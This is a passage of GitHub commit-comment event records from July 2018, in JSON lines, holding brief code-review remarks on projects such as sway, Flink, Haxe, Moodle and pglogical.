different."}},"created_at":"2018-07-03T07:43:45Z"}
{"id":"7910814289","type":"CommitCommentEvent","actor":{"login":"philsupertramp"},"repo":{"name":"JDAPweb/WA-project"},"payload":{"comment":{"id":29576556,"position":144,"line":88,"path":"question.php","commit_id":"c63df6f60fe5ce8166a1199b742e7d8bbc1b7677","created_at":"2018-07-03T07:44:23Z","updated_at":"2018-07-03T07:44:23Z","author_association":"COLLABORATOR","body":"klaro, am besten schreibst du ein Kommentar an der Stelle, dann finde ich das am besten :grin:"}},"created_at":"2018-07-03T07:44:23Z"}
{"id":"7910816212","type":"CommitCommentEvent","actor":{"login":"ringerc"},"repo":{"name":"pashagolub/pglogical"},"payload":{"comment":{"id":29576558,"position":null,"line":null,"path":null,"commit_id":"66e28106817bf309083c3392f9fb4eb22e262820","created_at":"2018-07-03T07:44:48Z","updated_at":"2018-07-03T07:44:48Z","author_association":"NONE","body":"... why?"}},"created_at":"2018-07-03T07:44:48Z"}
{"id":"7910817424","type":"CommitCommentEvent","actor":{"login":"ringerc"},"repo":{"name":"pashagolub/pglogical"},"payload":{"comment":{"id":29576561,"position":null,"line":null,"path":null,"commit_id":"e3ca6aa48619297961a35ae0ecb1d0ad324f81e0","created_at":"2018-07-03T07:45:05Z","updated_at":"2018-07-03T07:45:05Z","author_association":"NONE","body":"Thanks, cherry-picked"}},"created_at":"2018-07-03T07:45:05Z"}
{"id":"7910817644","type":"CommitCommentEvent","actor":{"login":"danielavi"},"repo":{"name":"danielavi/Maor-Daniel"},"payload":{"comment":{"id":29576562,"position":null,"line":null,"path":null,"commit_id":"5e097800253b0b913308debaad4fa0057180e0c2","created_at":"2018-07-03T07:45:09Z","updated_at":"2018-07-03T07:45:09Z","author_association":"OWNER","body":"comment "}},"created_at":"2018-07-03T07:45:09Z"}
{"id":"7910817798","type":"CommitCommentEvent","actor":{"login":"RyanDwyer"},"repo":{"name":"swaywm/sway"},"payload":{"comment":{"id":29576563,"position":5,"line":114,"path":"swaylock/main.c","commit_id":"6d1870aa1cede95885e7162ee75cd7fd29f2af23","created_at":"2018-07-03T07:45:11Z","updated_at":"2018-07-03T07:45:11Z","author_association":"MEMBER","body":"It'll return false if the PNG has an alpha channel. If every pixel has 255 alpha (ie. opaque) then it'll still return false, but I'm happy with that solution because the alternative is to scan every pixel."}},"created_at":"2018-07-03T07:45:11Z"}
{"id":"7910817993","type":"CommitCommentEvent","actor":{"login":"laurenz"},"repo":{"name":"pashagolub/pglogical"},"payload":{"comment":{"id":29576564,"position":null,"line":null,"path":null,"commit_id":"3b0c72c48d78b2d6071e1c7d45178bf32d7a8dd1","created_at":"2018-07-03T07:45:13Z","updated_at":"2018-07-03T07:45:13Z","author_association":"NONE","body":"Exactly, I didn't modify anything beyond that.\r\n\r\nThe change to `ReadDirExtended` with `INFO` fixed a case for us where we got an error on Windows."}},"created_at":"2018-07-03T07:45:13Z"}
{"id":"7910821409","type":"CommitCommentEvent","actor":{"login":"davosmith"},"repo":{"name":"moodle/moodle"},"payload":{"comment":{"id":29576573,"position":10,"line":28,"path":"user/profile/lib.php","commit_id":"7a097efc43ba8976972ec1938792f01376fc9f1b","created_at":"2018-07-03T07:45:57Z","updated_at":"2018-07-03T07:45:57Z","author_association":"CONTRIBUTOR","body":"I'm also not convinced about the logic described here - when I read the code, I see PROFILE_VISIBLE_ALL fields as editable by users with 'moodle/user:update', but I can't see any requirement for 'moodle/user:viewalldetails' (as the field is visible whether or not they have 'viewalldetails')."}},"created_at":"2018-07-03T07:45:57Z"}
{"id":"7910821964","type":"CommitCommentEvent","actor":{"login":"andyli"},"repo":{"name":"HaxeFoundation/haxe"},"payload":{"comment":{"id":29576574,"position":34,"line":34,"path":"std/php/_std/haxe/ds/Vector.hx","commit_id":"4a7a9bf57005e634711ee8735a886fc6d0c6a0b7","created_at":"2018-07-03T07:46:05Z","updated_at":"2018-07-03T07:46:05Z","author_association":"MEMBER","body":"Ah, ok. But I just checked that the `Array` php implementation is also a wrapper around `NativeIndexedArray`, so can we just use `typedef VectorData<T> = Array<T>;`?"}},"created_at":"2018-07-03T07:46:05Z"}
{"id":"7910822717","type":"CommitCommentEvent","actor":{"login":"danielavi"},"repo":{"name":"danielavi/Maor-Daniel"},"payload":{"comment":{"id":29576575,"position":3,"line":2,"path":"First Line","commit_id":"5e097800253b0b913308debaad4fa0057180e0c2","created_at":"2018-07-03T07:46:15Z","updated_at":"2018-07-03T07:46:15Z","author_association":"OWNER","body":"i added 132 "}},"created_at":"2018-07-03T07:46:15Z"}
{"id":"7910825289","type":"CommitCommentEvent","actor":{"login":"ringerc"},"repo":{"name":"pashagolub/pglogical"},"payload":{"comment":{"id":29576580,"position":null,"line":null,"path":null,"commit_id":"848283a585be3a1bdfb93aaaf8b61d230dbf4531","created_at":"2018-07-03T07:46:48Z","updated_at":"2018-07-03T07:46:48Z","author_association":"NONE","body":"Thanks, cherry-picked.\r\n\r\nI do out-of-tree builds so I don't generally notice."}},"created_at":"2018-07-03T07:46:48Z"}
{"id":"7910840682","type":"CommitCommentEvent","actor":{"login":"WeakBoss"},"repo":{"name":"WeakBoss/hello-world"},"payload":{"comment":{"id":29576609,"position":null,"line":null,"path":null,"commit_id":"3874dcea76173cb12a9818483208e495e4c4123f","created_at":"2018-07-03T07:50:11Z","updated_at":"2018-07-03T07:50:11Z","author_association":"OWNER","body":"debug"}},"created_at":"2018-07-03T07:50:11Z"}
{"id":"7910842617","type":"CommitCommentEvent","actor":{"login":"houfio"},"repo":{"name":"emotion-js/emotion"},"payload":{"comment":{"id":29576610,"position":7,"line":9,"path":"packages/jest-emotion/package.json","commit_id":"a8f4f8923e89aad7871ebcebd22e9c052197a2cb","created_at":"2018-07-03T07:50:32Z","updated_at":"2018-07-03T07:50:32Z","author_association":"NONE","body":"Shouldn't the `types/` directory get added here?"}},"created_at":"2018-07-03T07:50:32Z"}
{"id":"7910852681","type":"CommitCommentEvent","actor":{"login":"thefirefist"},"repo":{"name":"virtual-labs/basic-structural-analysis-iiith"},"payload":{"comment":{"id":29576622,"position":null,"line":null,"path":null,"commit_id":"746fe80ee72db08e875b4e8f099e082877e3a0df","created_at":"2018-07-03T07:52:42Z","updated_at":"2018-07-03T07:52:42Z","author_association":"NONE","body":"added the quiz results"}},"created_at":"2018-07-03T07:52:42Z"}
{"id":"7910853371","type":"CommitCommentEvent","actor":{"login":"RealyUniqueName"},"repo":{"name":"HaxeFoundation/haxe"},"payload":{"comment":{"id":29576625,"position":34,"line":34,"path":"std/php/_std/haxe/ds/Vector.hx","commit_id":"4a7a9bf57005e634711ee8735a886fc6d0c6a0b7","created_at":"2018-07-03T07:52:51Z","updated_at":"2018-07-03T07:52:51Z","author_association":"MEMBER","body":"Yes, but it will require to operate directly on the private field `Array.arr` which doesn't feel good :)\r\nAnd then `Vector.toData()` will emit a broken `Array` with \"holes\" in internal storage."}},"created_at":"2018-07-03T07:52:51Z"}
{"id":"7910857664","type":"CommitCommentEvent","actor":{"login":"olemp"},"repo":{"name":"Puzzlepart/prosjektportalen"},"payload":{"comment":{"id":29576637,"position":null,"line":null,"path":null,"commit_id":"f91b41d3155ec6b8c69022e68db0bd34b840fad4","created_at":"2018-07-03T07:53:46Z","updated_at":"2018-07-03T07:53:46Z","author_association":"CONTRIBUTOR","body":"👍 "}},"created_at":"2018-07-03T07:53:46Z"}
{"id":"7910859089","type":"CommitCommentEvent","actor":{"login":"mahmoudkassem"},"repo":{"name":"pixelbaker/ABAP-RayTracer"},"payload":{"comment":{"id":29576641,"position":11,"line":77,"path":"src/geometric_objects/zcl_art_plane.clas.abap","commit_id":"fd366e342d8f4ab4ac58549ee01b8a8ebde51995","created_at":"2018-07-03T07:54:03Z","updated_at":"2018-07-03T07:54:03Z","author_association":"NONE","body":"This needs to be dot_product1 instead, because the ELSE is visited only if dot_product2 equals 0. Which right now always returns -infinity regardeless of the sign of dot_product1."}},"created_at":"2018-07-03T07:54:03Z"}
{"id":"7910859800","type":"CommitCommentEvent","actor":{"login":"MJZ1977"},"repo":{"name":"FauziAkram/Stockfish"},"payload":{"comment":{"id":29576644,"position":null,"line":null,"path":null,"commit_id":"f63c2e1db7c65db8776fb469093e7befd0ae0004","created_at":"2018-07-03T07:54:12Z","updated_at":"2018-07-03T07:54:12Z","author_association":"NONE","body":"I think that Fauzi just wanted to show that several yellows can lead to a progress in the code.\r\nFor my part (end game extension) : you can change \r\n&&  (PvNode || (!PvNode && improving))\r\nto :  && (PvNode || improving)\r\nas suggested by Jerry Donald Watson.\r\nThis part lead to +1,5 ELO approximately. Perhaps with some tuning it can be improved and pass LTC."}},"created_at":"2018-07-03T07:54:12Z"}
{"id":"7910860889","type":"CommitCommentEvent","actor":{"login":"goodwinpress"},"repo":{"name":"gambitph/Titan-Framework"},"payload":{"comment":{"id":29576646,"position":null,"line":null,"path":null,"commit_id":"e83f3dd73e914d17ca7ee24dbe0cccc123d482fc","created_at":"2018-07-03T07:54:25Z","updated_at":"2018-07-03T07:54:25Z","author_association":"NONE","body":"Thank you very much!"}},"created_at":"2018-07-03T07:54:25Z"}
{"id":"7910864179","type":"CommitCommentEvent","actor":{"login":"Alan0623"},"repo":{"name":"Alan0623/cms-template-tpml"},"payload":{"comment":{"id":29576652,"position":null,"line":null,"path":null,"commit_id":"e71ab294d17eaba6833f131c875e107646fa4849","created_at":"2018-07-03T07:55:08Z","updated_at":"2018-07-03T07:55:08Z","author_association":"OWNER","body":"加入多語系"}},"created_at":"2018-07-03T07:55:08Z"}
{"id":"7910865615","type":"CommitCommentEvent","actor":{"login":"Chrysostomus"},"repo":{"name":"Chrysostomus/manjaro-architect"},"payload":{"comment":{"id":29576656,"position":null,"line":null,"path":null,"commit_id":"3117d31410ffa16a0ef169f6e97cb3547f2bf3ca","created_at":"2018-07-03T07:55:24Z","updated_at":"2018-07-03T07:55:24Z","author_association":"OWNER","body":"I got three messages, 2 of which did not open on my device, so I was only alerted to the issue and did not realise it was already resolved.\r\n\r\nI think moving the development to gitlab is good. I just had a small while to do something, and used the old infrastructure, because I had not yet setup the new one on my system. I'll be doing the development there from now on. "}},"created_at":"2018-07-03T07:55:24Z"}
{"id":"7910865822","type":"CommitCommentEvent","actor":{"login":"RyanDwyer"},"repo":{"name":"swaywm/sway"},"payload":{"comment":{"id":29576657,"position":20,"line":129,"path":"swaylock/main.c","commit_id":"6d1870aa1cede95885e7162ee75cd7fd29f2af23","created_at":"2018-07-03T07:55:26Z","updated_at":"2018-07-03T07:55:26Z","author_association":"MEMBER","body":"I don't think we can. The [wayland docs](https://wayland.freedesktop.org/docs/html/apa.html) say, under `set_input_region`:\r\n\r\n> A NULL wl_region causes the input region to be set to infinite.\r\n\r\nBut under `set_opaque_region` it says:\r\n\r\n> A NULL wl_region causes the pending opaque region to be set to empty."}},"created_at":"2018-07-03T07:55:26Z"}
{"id":"7910867944","type":"CommitCommentEvent","actor":{"login":"RealyUniqueName"},"repo":{"name":"HaxeFoundation/haxe"},"payload":{"comment":{"id":29576670,"position":34,"line":34,"path":"std/php/_std/haxe/ds/Vector.hx","commit_id":"4a7a9bf57005e634711ee8735a886fc6d0c6a0b7","created_at":"2018-07-03T07:55:52Z","updated_at":"2018-07-03T07:55:52Z","author_association":"MEMBER","body":"I guess if user wants to modify `VectorData` (which is a private type) manually, he should be ok with using `@:privateAccess`"}},"created_at":"2018-07-03T07:55:52Z"}
{"id":"7910870328","type":"CommitCommentEvent","actor":{"login":"StefanRRichter"},"repo":{"name":"indrc/flink"},"payload":{"comment":{"id":29576676,"position":76,"line":168,"path":"flink-runtime/src/main/java/org/apache/flink/runtime/state/filesystem/FsCheckpointStreamFactory.java","commit_id":"96def47c57ae58f9717ab35d41e1a4bf6d152851","created_at":"2018-07-03T07:56:23Z","updated_at":"2018-07-03T07:56:23Z","author_association":"NONE","body":"Yes, I think the replacement for the deprecated `RandomStringUtils` is `RandomStringGenerator`. The point of the question is more if we cannot reuse some existing code over implementing a custom solution, but if you see benefit in it I am also not against that approach."}},"created_at":"2018-07-03T07:56:23Z"}
{"id":"7910871177","type":"CommitCommentEvent","actor":{"login":"selbachgra"},"repo":{"name":"selbachgra/ome-pos"},"payload":{"comment":{"id":29576679,"position":null,"line":null,"path":null,"commit_id":"fdb9cbef3f2433dec57ca461cff9e0d91b9efb03","created_at":"2018-07-03T07:56:35Z","updated_at":"2018-07-03T07:56:35Z","author_association":"OWNER","body":"commit tex1"}},"created_at":"2018-07-03T07:56:35Z"}
{"id":"7910873811","type":"CommitCommentEvent","actor":{"login":"oberon-manjaro"},"repo":{"name":"Chrysostomus/manjaro-architect"},"payload":{"comment":{"id":29576682,"position":null,"line":null,"path":null,"commit_id":"3117d31410ffa16a0ef169f6e97cb3547f2bf3ca","created_at":"2018-07-03T07:57:09Z","updated_at":"2018-07-03T07:57:09Z","author_association":"COLLABORATOR","body":"Fine, no problem!\r\nI made a new matching [tag][https://gitlab.manjaro.org/applications/manjaro-architect/tags/0.9.14) now also on gitlab and updated the [PKGBUILD](https://gitlab.manjaro.org/packages/extra/manjaro-architect/commit/356d74731c2c4fb193fbfeff6c38a7462734bcdb) there aswell. rebuild seems unnecessary...\r\n**m-a-dev** pkg I have removed from the repos, since atm it is identical with stable pkg. But I have also added the [PKGBUILD](https://gitlab.manjaro.org/packages/extra/manjaro-architect-dev/commit/dff8ff3b6712c37a01261636248fbef40d46a9f4) and updated pkgver."}},"created_at":"2018-07-03T07:57:09Z"}
{"id":"7910876675","type":"CommitCommentEvent","actor":{"login":"StefanRRichter"},"repo":{"name":"indrc/flink"},"payload":{"comment":{"id":29576684,"position":20,"line":198,"path":"flink-contrib/flink-statebackend-rocksdb/src/main/java/org/apache/flink/contrib/streaming/state/RocksDBStateBackend.java","commit_id":"96def47c57ae58f9717ab35d41e1a4bf6d152851","created_at":"2018-07-03T07:57:44Z","updated_at":"2018-07-03T07:57:44Z","author_association":"NONE","body":"That would be very nice, but it is clearly not the \"fault\" of your PR. So if you feel like this is too much overhead for you, I could also do that in a followup."}},"created_at":"2018-07-03T07:57:44Z"}
{"id":"7910880617","type":"CommitCommentEvent","actor":{"login":"gfontenot"},"repo":{"name":"klaaspieter/dotfiles"},"payload":{"comment":{"id":29576693,"position":null,"line":null,"path":null,"commit_id":"1261b608a6d54ccb1b27fc24a84261bc6f326661","created_at":"2018-07-03T07:58:33Z","updated_at":"2018-07-03T07:58:33Z","author_association":"NONE","body":"You’re really just trusting @gabebw by proxy"}},"created_at":"2018-07-03T07:58:33Z"}
{"id":"7910883174","type":"CommitCommentEvent","actor":{"login":"aYaremchuk"},"repo":{"name":"aYaremchuk/bbtt"},"payload":{"comment":{"id":29576701,"position":3,"line":8,"path":"spec/models/user_spec.rb","commit_id":"73c5851c7b064ccf67a401d525dc9d4238103f75","created_at":"2018-07-03T07:59:07Z","updated_at":"2018-07-03T07:59:07Z","author_association":"OWNER","body":"it { is_expected.to have_and_belong_to_many(:groups) }\r\n"}},"created_at":"2018-07-03T07:59:07Z"}
{"id":"7910884436","type":"CommitCommentEvent","actor":{"login":"gfontenot"},"repo":{"name":"klaaspieter/dotfiles"},"payload":{"comment":{"id":29576702,"position":null,"line":null,"path":null,"commit_id":"e0256d71d62fc318d8ed7076d149087c77224bbb","created_at":"2018-07-03T07:59:22Z","updated_at":"2018-07-03T07:59:22Z","author_association":"NONE","body":":heart: I’d love to hear if you come up with any improvements! I’ve been enjoying the workflow so far."}},"created_at":"2018-07-03T07:59:22Z"}
{"id":"7910887581","type":"CommitCommentEvent","actor":{"login":"Stifael"},"repo":{"name":"PX4/Firmware"},"payload":{"comment":{"id":29576710,"position":120,"line":654,"path":"src/modules/mc_pos_control/mc_pos_control_main.cpp","commit_id":"b71732e484b9dc039b18140ddcacba1161ca111b","created_at":"2018-07-03T08:00:03Z","updated_at":"2018-07-03T08:00:03Z","author_association":"CONTRIBUTOR","body":"Since you anyway overwrite what is sent by flighttask, why is it necessary to subscribe within flighttask to the same trajectory_message? Is it not enough to have it just in the mc_pos_control_main?"}},"created_at":"2018-07-03T08:00:03Z"}
{"id":"7910894814","type":"CommitCommentEvent","actor":{"login":"StefanRRichter"},"repo":{"name":"indrc/flink"},"payload":{"comment":{"id":29576726,"position":5,"line":42,"path":"flink-runtime/src/main/java/org/apache/flink/runtime/state/filesystem/FsStateBackendFactory.java","commit_id":"96def47c57ae58f9717ab35d41e1a4bf6d152851","created_at":"2018-07-03T08:01:31Z","updated_at":"2018-07-03T08:01:31Z","author_association":"NONE","body":"Couldn't we just `trim()` the user string once in the beginning in a validation and cleaning step and from that point deal with the clean string? And if we consider `\"\"` as disabled, then the comparison is `string.length() > 0` which is in the same ballpark as a boolean flag and will not really matter in the total effort of writing checkpoint files."}},"created_at":"2018-07-03T08:01:31Z"}
{"id":"7910895848","type":"CommitCommentEvent","actor":{"login":"katarina11x"},"repo":{"name":"katarina11x/nlc-icd10-classifier"},"payload":{"comment":{"id":29576733,"position":54,"line":49,"path":"README.md","commit_id":"37a71e192da0d66c1c05978e6fac52573d53eb15","created_at":"2018-07-03T08:01:44Z","updated_at":"2018-07-03T08:01:44Z","author_association":"OWNER","body":"\r\nAdd deleted sampleOutput.png\r\n"}},"created_at":"2018-07-03T08:01:44Z"}
{"id":"7910896892","type":"CommitCommentEvent","actor":{"login":"khusika"},"repo":{"name":"KudProject/kernel_xiaomi_msm8953"},"payload":{"comment":{"id":29576734,"position":null,"line":null,"path":null,"commit_id":"d14367a84dab6858d715a24df3f9f3ea0076bff5","created_at":"2018-07-03T08:01:58Z","updated_at":"2018-07-03T08:01:58Z","author_association":"NONE","body":"Seems like this one is related to the OTA updater. As i know if we disable it it we can force to modify the system :thinking:"}},"created_at":"2018-07-03T08:01:58Z"}
{"id":"7910898703","type":"CommitCommentEvent","actor":{"login":"Brochato"},"repo":{"name":"TypeCobolTeam/TypeCobol"},"payload":{"comment":{"id":29576736,"position":29,"line":104,"path":"TypeCobol/Compiler/Scanner/Scanner.cs","commit_id":"d8d2f2cbf61c4fdc34c897bea9069dccf8fd5912","created_at":"2018-07-03T08:02:22Z","updated_at":"2018-07-03T08:02:22Z","author_association":"CONTRIBUTOR","body":"avoid the creation of a common comment Token."}},"created_at":"2018-07-03T08:02:22Z"}
{"id":"7910898963","type":"CommitCommentEvent","actor":{"login":"Hanamuke"},"repo":{"name":"MJZ1977/Stockfish"},"payload":{"comment":{"id":29576737,"position":null,"line":null,"path":null,"commit_id":"f59cc59f0285578bcd0abec2a0357b0999e993ef","created_at":"2018-07-03T08:02:26Z","updated_at":"2018-07-03T08:02:26Z","author_association":"NONE","body":"Maybe you can try to only apply the penalty if our side doesn't have any more pieces"}},"created_at":"2018-07-03T08:02:26Z"}
{"id":"7910901246","type":"CommitCommentEvent","actor":{"login":"andyli"},"repo":{"name":"HaxeFoundation/haxe"},"payload":{"comment":{"id":29576739,"position":34,"line":34,"path":"std/php/_std/haxe/ds/Vector.hx","commit_id":"4a7a9bf57005e634711ee8735a886fc6d0c6a0b7","created_at":"2018-07-03T08:02:57Z","updated_at":"2018-07-03T08:02:57Z","author_association":"MEMBER","body":"Though the `VectorData` typedef is private, the actual type in all targets (other than php) is public. If it is not meant to be usable outside `Vector`, there wouldn't be `toData()`/`fromData()`."}},"created_at":"2018-07-03T08:02:57Z"}
{"id":"7910901358","type":"CommitCommentEvent","actor":{"login":"discoursebot"},"repo":{"name":"discourse/discourse"},"payload":{"comment":{"id":29576740,"position":null,"line":null,"path":null,"commit_id":"b71cf6d422b43a8b10079978e8649ef5e44ac742","created_at":"2018-07-03T08:02:58Z","updated_at":"2018-07-03T08:02:58Z","author_association":"NONE","body":"This commit has been mentioned on **Discourse Meta**. There might be relevant details there:\n\nhttps://meta.discourse.org/t/new-search-operator-not/52087/42\n"}},"created_at":"2018-07-03T08:02:58Z"}
{"id":"7910904197","type":"CommitCommentEvent","actor":{"login":"Brochato"},"repo":{"name":"TypeCobolTeam/TypeCobol"},"payload":{"comment":{"id":29576745,"position":92,"line":665,"path":"TypeCobol/Compiler/Scanner/Scanner.cs","commit_id":"d8d2f2cbf61c4fdc34c897bea9069dccf8fd5912","created_at":"2018-07-03T08:03:37Z","updated_at":"2018-07-03T08:03:37Z","author_association":"CONTRIBUTOR","body":"We use a separate switch to prevent mixing Cobol Tokens and Formalized comments Tokens."}},"created_at":"2018-07-03T08:03:37Z"}
{"id":"7910908401","type":"CommitCommentEvent","actor":{"login":"curioswitch-role"},"repo":{"name":"curioswitch/curiostack"},"payload":{"comment":{"id":29576760,"position":null,"line":null,"path":null,"commit_id":"dfee5a8bba84ab41e0199b0268169f91c5f4ff48","created_at":"2018-07-03T08:04:33Z","updated_at":"2018-07-03T08:04:33Z","author_association":"NONE","body":"Build failed. Check the logs and try again.\n\nLogs:\nhttps://console.cloud.google.com/gcr/builds/6521e372-7365-4bab-96a8-be293c2b7d32?project=153942441948"}},"created_at":"2018-07-03T08:04:33Z"}
{"id":"7910908921","type":"CommitCommentEvent","actor":{"login":"overheadhunter"},"repo":{"name":"cryptomator/dokany-nio-adapter"},"payload":{"comment":{"id":29576761,"position":14,"line":558,"path":"src/main/java/org/cryptomator/frontend/dokany/ReadWriteAdapter.java","commit_id":"e50fa070dd37ba827aed3351fe7817e05819c977","created_at":"2018-07-03T08:04:41Z","updated_at":"2018-07-03T08:04:41Z","author_association":"MEMBER","body":"@infeo Are you sure `path1.endsWith(searchPattern.toString())` is doing what you intended? See http://saltnlight5.blogspot.com/2014/04/be-careful-with-java-pathendswithstring.html"}},"created_at":"2018-07-03T08:04:41Z"}
{"id":"7910912981","type":"CommitCommentEvent","actor":{"login":"sturobson"},"repo":{"name":"frctl/fractal"},"payload":{"comment":{"id":29576766,"position":null,"line":null,"path":null,"commit_id":"4d49b2262512babaaf1c23931f0d8e6297bf6c8c","created_at":"2018-07-03T08:05:34Z","updated_at":"2018-07-03T08:05:34Z","author_association":"CONTRIBUTOR","body":"Thanks Mark <3 "}},"created_at":"2018-07-03T08:05:34Z"}
{"id":"7910913078","type":"CommitCommentEvent","actor":{"login":"cmoulliard"},"repo":{"name":"snowdrop/kubernetes-info-webhook"},"payload":{"comment":{"id":29576767,"position":5,"line":33,"path":"README.md","commit_id":"7033a481bf4e07ef10903d1fff8040a8b09c9a76","created_at":"2018-07-03T08:05:36Z","updated_at":"2018-07-03T08:05:36Z","author_association":"MEMBER","body":"Should be : has the `cluster-admin` role"}},"created_at":"2018-07-03T08:05:36Z"}
{"id":"7910916929","type":"CommitCommentEvent","actor":{"login":"geoand"},"repo":{"name":"snowdrop/kubernetes-info-webhook"},"payload":{"comment":{"id":29576774,"position":5,"line":33,"path":"README.md","commit_id":"7033a481bf4e07ef10903d1fff8040a8b09c9a76","created_at":"2018-07-03T08:06:25Z","updated_at":"2018-07-03T08:06:25Z","author_association":"MEMBER","body":"True, I will fix it"}},"created_at":"2018-07-03T08:06:25Z"}
{"id":"7910920007","type":"CommitCommentEvent","actor":{"login":"laszlocsomor"},"repo":{"name":"bazelbuild/bazel"},"payload":{"comment":{"id":29576780,"position":null,"line":null,"path":null,"commit_id":"b20c10768a3abdc1be3ef142e33654c985fe690b","created_at":"2018-07-03T08:07:06Z","updated_at":"2018-07-03T08:07:06Z","author_association":"CONTRIBUTOR","body":"@cjluo-nuro : do you want to send a PR?"}},"created_at":"2018-07-03T08:07:06Z"}
{"id":"7910920575","type":"CommitCommentEvent","actor":{"login":"emersion"},"repo":{"name":"swaywm/sway"},"payload":{"comment":{"id":29576781,"position":20,"line":129,"path":"swaylock/main.c","commit_id":"6d1870aa1cede95885e7162ee75cd7fd29f2af23","created_at":"2018-07-03T08:07:13Z","updated_at":"2018-07-03T08:07:13Z","author_association":"MEMBER","body":"I was referring to an infinite region set with INT32_{MIN,MAX}."}},"created_at":"2018-07-03T08:07:13Z"}
{"id":"7910921196","type":"CommitCommentEvent","actor":{"login":"Majusna"},"repo":{"name":"Majusna/ud843_DidYouFeelIt-starting-point"},"payload":{"comment":{"id":29576784,"position":null,"line":null,"path":null,"commit_id":"33d989edc9b0b7672b6f8f776a46972385ffb543","created_at":"2018-07-03T08:07:20Z","updated_at":"2018-07-03T08:07:20Z","author_association":"OWNER","body":"Handle empty or null cases"}},"created_at":"2018-07-03T08:07:20Z"}
{"id":"7910927189","type":"CommitCommentEvent","actor":{"login":"oneswig"},"repo":{"name":"stackhpc/ansible-role-os-images"},"payload":{"comment":{"id":29576798,"position":56,"line":190,"path":"tasks/main.yml","commit_id":"e78499a812e9a6370b43e13d33cc1956ebb35987","created_at":"2018-07-03T08:08:37Z","updated_at":"2018-07-03T08:08:37Z","author_association":"MEMBER","body":"If you build the same image twice, will it not have different checksums due to file time stamps?  Worth checking as the logic here assumes that."}},"created_at":"2018-07-03T08:08:37Z"}
{"id":"7910927919","type":"CommitCommentEvent","actor":{"login":"vspinu"},"repo":{"name":"jabranham/ESS"},"payload":{"comment":{"id":29576800,"position":5,"line":950,"path":"lisp/ess-mode.el","commit_id":"43501f19167d94dbe8ef5a604bcafe53183ec8e3","created_at":"2018-07-03T08:08:46Z","updated_at":"2018-07-03T08:08:46Z","author_association":"NONE","body":"Arh, of course. Missed the elephant in the code :/"}},"created_at":"2018-07-03T08:08:46Z"}
{"id":"7910928626","type":"CommitCommentEvent","actor":{"login":"SakuraSa233"},"repo":{"name":"SakuraSa233/shadowsocks"},"payload":{"comment":{"id":29576802,"position":null,"line":null,"path":null,"commit_id":"60ad6988078047d31e82a6efe15f0e4682a1f3e3","created_at":"2018-07-03T08:08:55Z","updated_at":"2018-07-03T08:08:55Z","author_association":"OWNER","body":"Author: Telegram [@hammerzhu354](https://t.me/@hammerzhu354)"}},"created_at":"2018-07-03T08:08:55Z"}
{"id":"7910933753","type":"CommitCommentEvent","actor":{"login":"pacmancoder"},"repo":{"name":"ilammy/ilammy.github.io"},"payload":{"comment":{"id":29576811,"position":null,"line":null,"path":null,"commit_id":"6e974c9663651909fd770fbaa9c560dd5bb3bb8a","created_at":"2018-07-03T08:10:02Z","updated_at":"2018-07-03T08:10:02Z","author_association":"NONE","body":"Спасибо что продолжаешь делать дайджесты 👍!\r\n\r\n`Transparently running binaries from any architecture in Linux with QEMU and binfmt_misc` - круто, выглядит действительно очень удобным подходом!\r\n\r\n`как играть в требовательные игры даже на слабом ноутбуке` - кстати, это не новая идея, на протяжении прошлых лет такие сервисы то появлялись, то исчезали.\r\n\r\nP.S: Может для комментиков в блоге disquss заюзаешь?"}},"created_at":"2018-07-03T08:10:02Z"}
{"id":"7910940625","type":"CommitCommentEvent","actor":{"login":"jacekkopecky"},"repo":{"name":"Robinson38/DiagramGeneration"},"payload":{"comment":{"id":29576824,"position":67,"line":323,"path":"generate_SUMS_diagram_SVG.js","commit_id":"862ae2263ceafb9ada8c1a3ba688fd8a7b69d9bd","created_at":"2018-07-03T08:11:27Z","updated_at":"2018-07-03T08:11:27Z","author_association":"NONE","body":"this could use `htmlFileList()`\r\n\r\nplus the next line could be `const s = ...` then drop `let s;` above"}},"created_at":"2018-07-03T08:11:27Z"}
{"id":"7910941970","type":"CommitCommentEvent","actor":{"login":"evansb"},"repo":{"name":"source-academy/cadet"},"payload":{"comment":{"id":29576825,"position":24,"line":29,"path":"terraform/cadet/inputs.tf","commit_id":"d2cb217e79917320c24b08ee3128cdaf39c94eeb","created_at":"2018-07-03T08:11:45Z","updated_at":"2018-07-03T08:11:45Z","author_association":"CONTRIBUTOR","body":"your password will appear in Terraform state file as plain text by the way"}},"created_at":"2018-07-03T08:11:45Z"}
{"id":"7910942102","type":"CommitCommentEvent","actor":{"login":"Klangphase"},"repo":{"name":"Klangphase/klangphase.github.io"},"payload":{"comment":{"id":29576826,"position":null,"line":null,"path":null,"commit_id":"3368aa5c7cee3490ffdedd509954574ef1c0e617","created_at":"2018-07-03T08:11:46Z","updated_at":"2018-07-03T08:11:46Z","author_association":"OWNER","body":"moved index into layout"}},"created_at":"2018-07-03T08:11:46Z"}
{"id":"7910943129","type":"CommitCommentEvent","actor":{"login":"AlexGhiondea"},"repo":{"name":"hanabi1224/CommandLine"},"payload":{"comment":{"id":29576829,"position":null,"line":null,"path":null,"commit_id":"dd4f87eef25aae9e9ff21a2783299093e144aa0b","created_at":"2018-07-03T08:12:00Z","updated_at":"2018-07-03T08:12:00Z","author_association":"NONE","body":"I have it working, but I can't figure out why I am not seeing the code coverage (or even the test numbers) for the analyzer project in either AppVeyor or Codecov. \r\n\r\nI am going to merge the PR that enables this at least for the parser for now.\r\n\r\nLet me know if you have any ideas of what to check"}},"created_at":"2018-07-03T08:12:00Z"}
{"id":"7910943828","type":"CommitCommentEvent","actor":{"login":"staabm"},"repo":{"name":"FriendsOfREDAXO/undo"},"payload":{"comment":{"id":29576830,"position":28,"line":28,"path":"lib/undo.php","commit_id":"31db007f6a502a66c222ab70c997398071d2fd66","created_at":"2018-07-03T08:12:09Z","updated_at":"2018-07-03T08:12:09Z","author_association":"MEMBER","body":"wird hier bewusst die komplette article undo historie gelöscht, nicht nur die zu einem speziellen Artikel o.ä.?\r\n\r\nwarum passieren vorher die selects auf ID, wenn das ergebnis daraus nirgends verwendet wird?"}},"created_at":"2018-07-03T08:12:09Z"}
